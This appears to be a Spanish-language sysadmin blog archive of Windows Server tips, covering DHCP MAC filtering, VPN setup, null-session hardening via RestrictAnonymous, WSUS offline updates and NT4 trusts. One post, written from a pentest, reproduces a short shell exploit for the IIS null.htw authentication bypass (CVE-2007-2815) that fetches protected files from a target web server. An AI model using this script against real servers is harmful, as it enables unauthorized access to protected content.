Mi límite entre lo monótono y la aventura...

Banner 468

Inicio
RSS
Mostrando entradas con la etiqueta Microsoft. Mostrar todas las entradas
Mostrando entradas con la etiqueta Microsoft. Mostrar todas las entradas

Para evitar que el S.O. levante antes que haya levantado la placa de Red, por el tema de los "logon scripts"

Editar la Policy:
 
Computer Configuration \ Administrative Templates \ System \ Logon \ Always
wait for the network at computer startup and logon (ENABLED)

[ Leer más ]

Admintools 2008

Las Herramientas de administración remota del servidor para Windows® 7 con SP1 permiten a los administradores de TI administrar funciones y características instaladas en equipos que ejecutan Windows Server® 2008 R2, Windows Server® 2008 o Windows Server® 2003 desde un equipo remoto que ejecuta Windows 7 o Windows 7 con SP1.


Link descarga
[ Leer más ]

Filtrar Direcciones MAC en el DHCP de Windows Server 2003

Hasta hoy no me había surgido la necesidad de implementar una solución que requiriese filtrado MAC mediante DHCP en win 2003/2008.  Windows 2008 R2 ya incluye esta solución, en cambio para 2003 y 2008, hay que hace lo que describe el siguiente artículo.

El servicio DHCP en Windows 2003 Server no tiene la posibilidad en primera instancia de realizar un filtrado por direcciones MAC, es decir, no se le puede especificar que clientes pueden o no adquirir una dirección IP dentro de la LAN.

En el servicio se puede crear una reserva, que ofrece la posibilidad de asignar la misma dirección IP a una dirección MAC determinada, pero esto no ofrece un nivel de seguridad que garantice que clientes que no pertenecen a la organización se conecten a la red y puedan hacer uso de algún servicio que no esté restringido.

Para esto se puede utilizar un complemento que se llama DHCP Server Callout DLL, liberado por el Equipo de Desarrollo DHCP de Microsoft especialmente para Win 2008 Server, pero se puede utilizar en un Win 2003.

Les dejo el enlace para descargar el archivo comprimido que contiene el paquete instalador .MSI para arquitecturas x64 y x86

Despues de instalar el complemento (no es necesario reiniciar el S.O), el archivo de la documentación: SetupDHCPMacFilter.rtf, queda ubicado en la carpeta %SystemRoot%\system32, normalmente es C:\WINDOWS\system32, en servidores x86.

Luego, en el directorio donde se ubican las opciones del DHCP ( C:\WINDOWS\system32\dhcp), aparecen tres nuevos archivos producto de la instalación:


El archivo MACList.txt es en el cual se colocan las direcciones MAC y según el parámetro MAC_ACTION, se permite o se niega una Dirección IP para estos clientes, cabe anotar que solo se permite una acción en el archivo, o todas las MAC reciben una IP o a todas se les niega, no se permiten las dos opciones al mismo tiempo.
Un ejemplo de la estructura de este archivo es la siguiente:



Cuando se añade una nueva dirección MAC se debe reiniciar el servicio DHCP.
En el visor de sucesos de Windows, debe quedar un evento especificando que una librería de tipo callout fue cargada con éxito, de esta manera, nos damos cuenta que el filtrado se está cumpliendo.



Link: Aquí
[ Leer más ]

Armar conexión VPN en windows 7 starter

Set up a remote connection to your workplace using VPN

From another location, you can connect to a workplace network or another network by using a virtual private network (VPN) connection. Ask your network administrator for the name of the VPN server before you open the wizard.
  • Open the Connect to a Workplace wizard by clicking the Start button Picture of the Start button, and then clicking Control Panel. In the search box, type network, click Network and Sharing Center, click Set up a connection or network, and then click Connect to a workplace.
[ Leer más ]

Haciendo pentest sobre un Webserver di con un viejo problema el cual desconocía, con lo cual procedo a dejarme documentado en este post la info para explotar el problema.

Microsoft IIS ntlm and basic auth bypass
You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.

Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.

In the exploit you can see how to use the null.htw object.

Código:


#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info
# (CVE-2007-2815)

if [ $# != 2 ]
then
printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";
exit 0
fi

site=$1
protectedObject=$2
variabledatos=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&
CiRestriction=b&CiHiliteType=full'
lynx -dump $variabledatos



Fuente; badchecksum.net
[ Leer más ]

Error inesperado

Llevaba ya algunos días sin poder acceder a la ventana de propiedades de las Conexiones de red. Cuando lo intentaba se abría una pequeña ventana con el mensaje que aparece en el título de este artículo: Ocurrió un error inesperado.
Ayer lo volví a intentar y apareció de nuevo el mensaje de error. Quería realizar un cambio en la configuración del Protocolo TCP/IP y no podía. Me acerqué a las páginas de Ayuda y Soporte Técnico de Microsoft y localicé la forma de solucionar el problema. El fallo se debe a errores que se han producido en las configuraciones del Registro de Windows. Para solucionarlo hay que volver a registrar una o dos librerías del sistema. Lo hice y todo funciona de nuevo. Ahora ya puedo abrir la ventana de Propiedades de Conexión de Internet (o de cualquier otra conexión de red).
En primer lugar debes recuperar el registro de la librería Netshell.dll. Para ello haz lo siguiente:
  • Vete a Inicio \ Ejecutar.
  • Escribe, en el recuadro Abrir, lo siguiente:
    regsvr32 %systemroot%\system32\netshell.dll
    y pulsa sobre Aceptar.
  • Cierra la ventana que se abre pulsando también sobre Aceptar.
Error inesperado
Si todavía no funciona la opción de Propiedades de tu Conexión de red, tendrás que registrar, de forma similar, la librería Ole32.dll:
  • Vete otra vez a Inicio \ Ejecutar.
  • Escribe, en el recuadro Abrir, lo siguiente:
    regsvr32 %systemroot%\system32\ole32.dll
  • Pulsa dos veces, sucesivamente, sobre Aceptar.
Ahora ya podrás acceder a la ventana de Propiedades de Conexión de Red. Si sigues teniendo problemas, tendrás que, antes de nada, reiniciar el equipo.

Fuente: http://lecciones.batiburrillo.net/2008/10/08/ocurrio-un-error-inesperado.htm
[ Leer más ]

CA y SSL bajo windows 2003 Server

Referencias para el tema CA y SSL bajo Microsoft Windows 2003 Server


Petición de Certificado servidor Web en Windows (Ver site completo tb)
http://tecnoredes83.blogspot.com/2009/02/peticion-de-certificado-servidor-web-en.html


Instalar Entidad Certificadora en Windows Server 2003
https://serversandservers.wordpress.com/2009/02/26/instalar-entidad-certificadora-en-windows-server-2003/


Generating an IIS SSL Certificate Signing Request (CSR) using Microsoft IIS 5.x / 6.x
http://csrtest.com/csr_microsoft_iis5-6-ukrainian-uah.html


Backing up and Restoring the pending request in IIS 5 or 6
https://support.comodo.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=824


Internet Information Server [IIS6] Windows Server 2003 con SSL
https://proteneo.wordpress.com/2009/07/28/internet-information-server-iis6-windows-server-2003/


SSL
http://www.scribd.com/doc/13945211/SSL2WINDOWS


SSL en windows server 2003
http://www.scribd.com/doc/12935892/Ssl-en-Windows-Server-2003



[ Leer más ]

Referencias SQL 2005

Algunos sites de referencia básica para ayuda memoria sobre SQL 2005:

Exelente Site, que incluye temas como:
- Instalación Services Packs
- Primeras configuraciones
- Instalar SQL 2005 en Cluster
http://www.guillesql.es/Articulos/Instalar_SQLServer_SSAS_SSIS_Cluster.aspx



Instalación SQL 2005 paso a paso
http://www.adrformacion.com/cursos/sqlserver/leccion1/tutorial4.html



[ Leer más ]

Herramientas Ms.

[ Leer más ]

Checklist de instalación previa Tcp/IP para instalar ISA Server 2006

Checklist

 
wfilter01-11) Contar con el diseño de red a implementar que indique claramente el direccionamiento IP segmentado por zona
2) Renombrar las tarjetas del red (Ejemplo Interna-Externa-DMZ)
3) Deshabilitar netbios de la tarjetas de red externa.
4) Deshabilitar archivos e impresoras compartidas de la tarjeta externa.
5) Deshabilitar cliente para redes Microsoft de la tarjeta externa.
6) Deshabilitar registro DNS de la tarjeta de red externa u otra red que no sea la interna. (Esto ya que el registro al DNS debe realizarse con la tarjeta donde se encuentren ubicados los Controladores de Dominio, normalmente la red interna).
7) Si el equipo es miembro de un dominio, habilitar la configuración DNS únicamente en la tarjeta interna. Si el equipo esta en un grupo de trabajo entonces la configuración debe ir en la tarjeta externa. En ningún caso se debe configurar mas de una tarjeta al mismo tiempo.
8) EL Gateway se define únicamente para la tarjeta externa. No pueden habilitarse 2 gateway ni en una misma tarjeta, ni en tarjetas distintas. En el caso que se requiera enrutar mas de 1 segmento en la red interna, se deben agregar al rutas al sistema en forma de rutas estáticas. (route add DESTINO mask MASCARA GATEWAY -p)
9) En las opciones avanzadas (Advanced Settings de las conexiones de red), se debe configurar las prioridad de como los servicios acceden a los recursos. La prioridad la mantiene la tarjeta interna desde donde se acceden a los servicios de active directory.

fuenteForeFrontMvp
[ Leer más ]

Referencias XP y mmc

[ Leer más ]

Windows Home Server V2

Noticias como esta no se como es que se me pasan, no por que la noticia sea importante, sino que pone en alerta mi sistema de actualización personal.

Vía DesarrolloWeb cito:

- Windows Home Server V2, es la última versión del sistema operativo para servidores caseros con el que facilitar que los ordenadores de un hogar compartan recursos.



Entre las novedades que vamos a encontrar en este sistema basado en Windows Server 2008 R2 que se encuentra todavía en fase beta, destaca la posibilidad de compartir archivos de manera más simple, acceso remoto, mejoras en el sistema de copia de seguridad de equipos, configuración más sencilla, integración con Windows 7, aumento en las herramientas de desarrollo y ampliación de medios streaming.




Windows Home Server V2 disponible solo en versiones de 64-bit,requiere procesador 1.4 GHz, 1GB de memoria RAM, y un dispositivo de almacenamiento de 160GB.

Les dejo un link con tutorial de instalación.

.
[ Leer más ]

Windows 7 - Versiones

[ Leer más ]

RestrictAnonymous Logins - Windows 2000

Restrict Anonymous Logins
Antes de comenzar a hablar sobre este casi olvidado tema me voy a adentrar en explicar algunos puntos a cubrir respecto de lo que llamamos "Null user" (usuario nulo).
Dentro de lo que es el esquema de autenticación de Microsoft Windows, se encuentra el objeto "user" (usuario).  Cuando creamos una cuenta, se le esta asignando derechos, privilegios y politicas restrictivas respecto de lo que puede hacer o no dentro de nuestra red.
Adicionalmente de las cuentas de usuario standard, Windows admite un tipo especial de cuenta llamado "Null User", que basicamente es una pseudo-cuenta que no tiene nombre de usuario o contraseña, pero se le permite acceder a cierta información en la red.
Por su diseño, dicha cuenta puede enumerar nombres de cuentas y recursos compartidos en los controladores de dominio, en los servidores miembro así como también en las estaciones de trabajo.  Con lo cual un usuario sin credenciales (Null User), puede ser utilizado para conseguir bastante información de nuestra red.

Como bien leí por ahi, la pregunta a formularnos es ""porque es necesaria esta "cuenta"?"

La cuenta "Null User" es utilizada por IPC$ (Interprocess Communications - Comunicación entre procesos).
Para ser más claros con un ejemplo, en un modelo de multiples dominios donde las relaciones de confianza creadas son unidireccionales (one-way), la cuenta "Null user" es utilizada cuando los permisos para los recursos en el dominio confíado (dominio A) necesitan ser asignados a cuentas de usuario del dominio confiado (dominio B) para acceder a los mismos. Con lo cual es necesario que exista una forma de poder listar las cuentas del dominio vecino sin estar autorizados/confiados en el mismo, he aquí un modo claro de ver la utilidad de dicha cuenta.

Entonces vemos que el problema que se nos presenta, es que cualquier persona con acceso a establecer una conexión NETBIOS, puede facilmente obtener un listado completo de todos los nombres de usuario, grupos, recursos compartidos, permisos, politicas, servicios y más.

Una buena herramienta para probar esto es DUMPSEC, la cual pueden bajar desde:
 


Aparece RestrictAnonymous para NT

La situación anteriormente comentadada fue notada por Microsoft, quien con la salida de SP3 nos brindo la hermosa rama:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA (RestrictAnonymous)

con lo cual un administrador puede "solucionar" dicho inconveniente cambiando un simple valor de parametro y listo. No más ataques de enumeración y todos contentos.. pero...

paso que de golpe alguien vio que NT4 no impedía la obtención de información (enumeración) mediante el agregado de esta Key en la registry, sino que solo lo limitaba.  Ya que la funcionalidad del "null user" es más que necesaria para las funciones principales de Dominio de NT, Microsoft tomo la desición de solo limitar algunas de esas funcionalidades en lugar de eliminarlas.
De esta manera lo que se hizo fue agregarle ACLs a ciertas APIs (Ej: NetServerGetInfo), para impedir que sean invocados por una sesion "Null user", pero dejo de lado muchas otras, con lo cual el problema persistió (Ej:LookupAccountName).

El problema es que podriamos conseguir al conseguir el SID de un grupo recurrente (ej: domain admins) y concatenarlo con el UserID de las cuentas Built-in (Ej: Administrador = 500) a una porción del SID se podría determinar el SID full de dicho usuario incluso hasta si se ha renombrado la cuenta.



Que ocurrió con Windows 2000?

Llego el turno de RestrictAnonymous para Windows 2000 y con el más sorpresas.  Windows 2000 introduce soporte para un nuevo valor en la rama RestrictAnonymous, de "2".
Este valor 2 No permite acceso sin permisos anónimos explícitos según la documentación de Microsoft.  Con este valor, el token de acceso creado para los usuarios "no autenticados" no incluye el grupo EVERYONE, por lo que ya no se tiene acceso a recursos que conceden permisos a dicho grupo.
Pero ojo, no todo es paz y amor (que raro), Cuando el valor RestrictAnonymous se establece en 2 en el Registro para un controlador de dominio basado en Microsoft Windows 2000, tambien se esta restringiendo lo siguiente:


 
  • Las estaciones de trabajo o servidores miembro no pueden establecer un canal seguro de netlogon.
  • Los controladores de dominio de los dominios que confían no pueden configurar un canal seguro de netlogon.
     (recordemos que por ejemplo NT crea una sesión de inicio con la cuenta "Null User", contra un controlador de dominio después que su nombre NETBIOS fuese registrado correctamente por este, previo a tener que loguearnos con una cuenta de usuario.  De modo que NT requiere establecer un inicio de sesión "null" exitoso, ya que sino no sería capaz de inicializar un canal seguro de netlogon contra el DC)

  • Los usuarios de Microsoft Windows NT no pueden cambiar su contraseña cuando ésta ha caducado.
  • El servicio BROWSER, no puede listar dominios o servidores desde el Master Browser, Backup Master Browser o Domain Master Browsers que tengan seteado el valor RestrictAnonymous del Registro en 2.
     

Por estos motivos es que para Entornos en modo Mixto, se recomienda no configurar en 2 el valor de RestrictAnonymous. Si es recomendable hacerlo en entornos 100% 2000 y trás haber realizado todas las pruebas pertinentes.
Ojo si tenemos relaciones de confianza con dominios NT, ya que el setear el valor en 2, sabemos que traerá problemas.

Otro dato a tener en cuenta, es que a la hora de aplicar plantillas de seguridad High predefinidas, configuran el valor de RestrictAnonymous en 2, con lo cual sepan a que estan sujetos en caso de aplicarlas.

Para cerrar el tema, cito parte del KB de Microsoft

RestrictAnonymous se configura cambiando la clave del Registro a 0 o a 1 para Windows NT 4.0, o a 0, 1 ó 2 en el caso de Windows 2000. Estos números corresponden a las configuraciones siguientes:


                     0     Ninguna. Se basa en los permisos predeterminados

                     1     No permite la enumeración de nombres y cuentas SAM

                     2     No permite acceso sin permisos anónimos explícitos



Bien, has leido todo y estas decidido a ajustar un poco más el tema seguridad en tu red?

COn una cuenta con los permisos suficientes, vás a INICIO, EJECUTAR, escribe REGEDIT
Efectúa un backup de la rama a modificar en caso que algo no resulte bien y luego procede a cambiar el siguiente valor:

Valor del Registro RestrictAnonymous
Utilice el Editor del Registro para ver la clave del Registro siguiente y, a continuación, agregue el valor siguiente a esta clave; o modifíquela si el valor ya existe:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA

Valor: RestrictAnonymous

Tipo del valor: REG_DWORD
Información del valor: 0x2 (Hex)


Para que se apliquen los cambios habrá que reiniciar el equipo.





Enlaces consultados:


Mskb Q246261:  How to use the RestrictAnonymous registry value in Windows 2000
Mskb Q143474: Restringir la información disponible a los usuarios anónimos
MSKB Q129457: RestrictAnonymous Access Enabled Lets Anonymous Connections Obtain the Password Policy Mskb Q129457: RestrictAnonymous acceso permitido Permite conexiones anónimas obtener la directiva de contraseñas
MSKB Q246261: Como usar el valor de registro RestrictAnonymous Registry en Windows 2000
Mskb Q246261: Cómo utilizar el valor del Registro RestrictAnonymous en Windows 2000

Security Focus - RestrictAnonymous
http://www.securityfocus.com/infocus/1352
[ Leer más ]

Varias MMC

Un paper que tenía colgado del corcho de la oficina el cual es bastante útil para quienes nos dedicamos a administración iT:

ciadv.msc: Permite configrurar el servicio de "indexado", que acelera las búsquedas en el disco rígido.

compmgmt.msc: (Computer Management) Da accesso a la administración del equipo local. Permite administración de otras Pc's también.

devmgmt.msc:  Administrador de dispositivos

diskmgmt.msc:  Administrador de discos

fsmgmt.msc: (Shared Folders) Monitorización y administración de recursos compartidos. Permite ver que recursos compartimos, quienes estan haciendo uso de alguno de ellos y cuales estan en uso.

gpedit.msc: Edicion de Politicas de seguridad.

lusrmgr.msc:  Administración de cuentas de usuarios y grupos.

ntmsmgr.msc: Administración y control de dispositivos de almacenamiento extraibles.  Ideal para ver que dispositivos USB se han estado conectando a nuestra PC ultimamente.








ntmsoprq.msc:  Monitoreo de las solicitudes de operador de medios extraibles.

perfmon.msc: (Performance monitor) ideal para resolver problemas y tunnear el sistema. 

secpol.msc: (Local Security Policy) Permite la edición de politicas de seguridad locales del equipo.

services.msc: Administrador de servicios.

wmimgmt.msc: Administrador de WMi.
[ Leer más ]

Vence Soporte para Windows 2000 y XP

Microsoft:

Support is ending for some versions of Windows

  • Support for Windows Vista without any service packs will end on April 13, 2010.
  • Support for Windows XP with Service Pack 2 (SP2) will end on July 13, 2010.*

If you're running one of these versions after support ends, you won't get security updates for Windows

Microsoft ha dado a conocer las fechas en las cuales Windows 2000, Vista y XP dejarán de tener soporte.
Se viene la migración definitiva? Hora de oportunidades amigos!


[ Leer más ]

PST Liberado

Microsoft ha liberado las especificaciones de sus archivos .PST pertenecientes a Ms. Outlook, con lo cual dentro de poco tiempo podremos estar viendo aplicaciones de codigo abierto que hagan uso del mismo.

Fuente: http://msdn.microsoft.com/en-us/library/ff385331.aspx
[ Leer más ]

WSUS Offline Update

El actualizar Windows en muchos sistemas, en algunos casos puede ser agotador, especialmente cuando tenemos una conexión lenta y el archivo de actualización es muy grande. Esto puede tomar mucho tiempo y nos puede traer serios problemas de seguridad, ya que si se trata de una actualización crítica, la cuál debemos instalar lo antes posible, nos deja indefensos más tiempo del que deberíamos estar.

Para achicar un poco esa ventana de tiempo que tenemos al actualizar y para facilitar la actualización de varios sistemas en el menor tiempo posible, la gente de WSUS, ofrece un software que contiene una serie de scripts que nos permiten actualizar Windows 2000, XP, 2003, Vista y Server 2008, de una manera facil y mucho más rápida. Pero eso no es todo, también nos permite la actualización de los productos de Microsoft Office. Ese software se llama WSUS Offline Update.




Antes de seguir es necesario aclarar que aunque en el párrafo anterior exprese que es especial para sistemas con conexiones lentas, también lo podemos usar sin problemas en otras circunstancias, ya que este procedimiento nos dá la posibilidad no solo de instalar directamente los ficheros de actualización, también nos permite crear una imagen ISO, que podemos cargar directamente desde el sistema o grabar un CD o DVD, para aplicar las actualizaciones a otros ordenadores.

El software nos permite elegir los ficheros de actualización en el idioma en que hayamos instalado Windows.




Una vez que generamos la ISO, montamos la misma en el sistema o cargamos el disco y ejecutamos el programa incluído en la imagen, llamado updateinstaller.exe. Esa es toda nuestra interacción, ya que este programa crear una cuenta temporaria con la autorización para instalar las actualizaciones y realizar todas las tareas de booteo y demás, necesarias en el proceso de actualización de Windows.

Una vez finalizado el proceso, borra la cuenta temporaria en forma automática y ya podemos utilizar el sistema en forma normal.

Para los que andamos trabajando con varios ordenadores, es un procedimiento que nos facilita la tarea de actualización de una forma muy notable.


Fuente:  Taringa

[ Leer más ]

Relaciones de confianza entre NT4 y W2003

Desde hace unos días estoy trabajando en las oficinas nuevas de la empresa, y se presento la necesidad de que los usuarios, trabajen con un sistema viejo que esta en un dominio fuera del Forest, lo que me trajo 2 días de laburo hasta que todo quedo solucionado con una mágica palabra

"WINS"

Uno olvida que los viejos NT requieren de este servicio para muchas de sus tareas.




Resumen

Levantar Server Wins en alguna de las 2 redes.
Apuntar ambos DC a dicho server.
Ver que se registren (nbtstat -RR)
Ver el cache de registros (nbtstat -c)

Armar la relación de confianza entre ambos extremos.




Dejo una serie de Links que me fueron útiles dentro de esta tarea:



Instalar WINS en Windows 2000 Server o Windows 2000 Advanced Server
http://support.microsoft.com/kb/307314/es

Examinar dominios en TCP/IP y archivos LMHOSTS
http://support.microsoft.com/kb/q150800/

Como Relaciones de confianza entre NT y W2003
http://support.microsoft.com/kb/325874/

Como funcionan las relaciones de confianza en W2003
http://technet.microsoft.com/es-es/library/cc773178(WS.10).aspx

NT PDC no encuentra DC al establecer una relación de confianza
http://support.microsoft.com/kb/178640/


No se puede establecer Relación de Confianza con NT, no se puede establecer un dominio de Active Directory o no funciona como se esperaba
http://support.microsoft.com/kb/889030/

Create trust relationship between NT4 and Windows 2003 domains
http://www.winfrastructure.net/article.aspx?BlogEntry=Create-trust-relationship-between-NT4-and-Windows-2003-domains

Archivo LMHOST
http://support.microsoft.com/kb/180094


Cómo establecer confianzas con un dominio basado en Windows NT en Windows Server 2003
http://support.microsoft.com/kb/325874
[ Leer más ]

Updates Off-Line para todos los Windows

Encontre una herramienta que contiene una serie de scripts que permiten actualizar Windows 2000, XP, 2003, Vista y Server 2008, así como productos de Microsoft Office, sin la necesidad de estar conectados a internet (Ojo, al momento de escoger el S.O. a updatear, por única vez si requiere conectividad).

Este producto incluso, permite armar una Imagen ISO, la cual puede ser grabada para ser utilizada en varias PC's al mismo tiempo.

Ideal para aquellos puestos de trabajo con una conectividad lenta o bien que no poseen alguna.





Site: http://www.wsusoffline.net/
[ Leer más ]